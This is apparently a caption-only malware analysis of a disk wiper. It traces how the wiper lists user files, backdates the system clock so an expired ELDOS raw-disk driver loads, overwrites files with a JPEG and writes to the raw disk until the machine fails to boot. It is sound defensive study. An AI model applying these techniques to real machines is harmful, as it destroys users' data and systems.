They keep getting appended with dir output, listing all the files in the user profiles:



After creating these files with the list of all files in the user directories, the wiper opens the inf file to read it:




Now reading f2.inf


After reading all the file paths in both inf files and putting this info into a buffer, the wiper proceeds to query the SystemBootDevice value from the registry:



It also looks for the value "FirmwareBootDevice"


The wiper gets the system time to check whether the current date is beyond the expiry date of the ELDOS driver license. If it is, it sets the system time to a back date:


Setting the system time to August 2012 so that the ELDOS driver can be loaded


System date/time backdated:


What does the following indicate:


Accessing the disk in raw mode for RW using the ELDOS driver


Since there is no HardDisk9, an error is returned that the path was not found. So it goes backwards and tries to open HardDisk8, 7, 6... and so on


Once it succeeds, it iterates through the files in f1.inf and f2.inf and starts wiping them. It opens the files one by one, sets the file pointer and then overwrites them with the image:


Overwriting with the image. You can see the JPEG header in the dump:


Wiping ongoing


The file f1.inf itself got overwritten (wiped) with the JPEG image:


Meanwhile, let's see the image. Extracting it from netx.exe using a hex editor:


The image is corrupted. Compare it to the original image:


Next we see the wiper open \Device\ElRawDisk to write to the raw disk


Everything is turning into empty icons


Then there is a breakpoint on the DeviceIoControl function



I am not sure what IOControlCode 70048 is, which is passed on to the raw disk exposed by the ELDOS driver (read as hex, 0x70048 is IOCTL_DISK_GET_PARTITION_INFO_EX: device type FILE_DEVICE_DISK, function 0x12, METHOD_BUFFERED, which fits the partition lookups seen earlier). However, let us see what is returned in the out buffer:


Progress:


0-byte lnk files everywhere


In the end


Boot error. Wipe Successful!

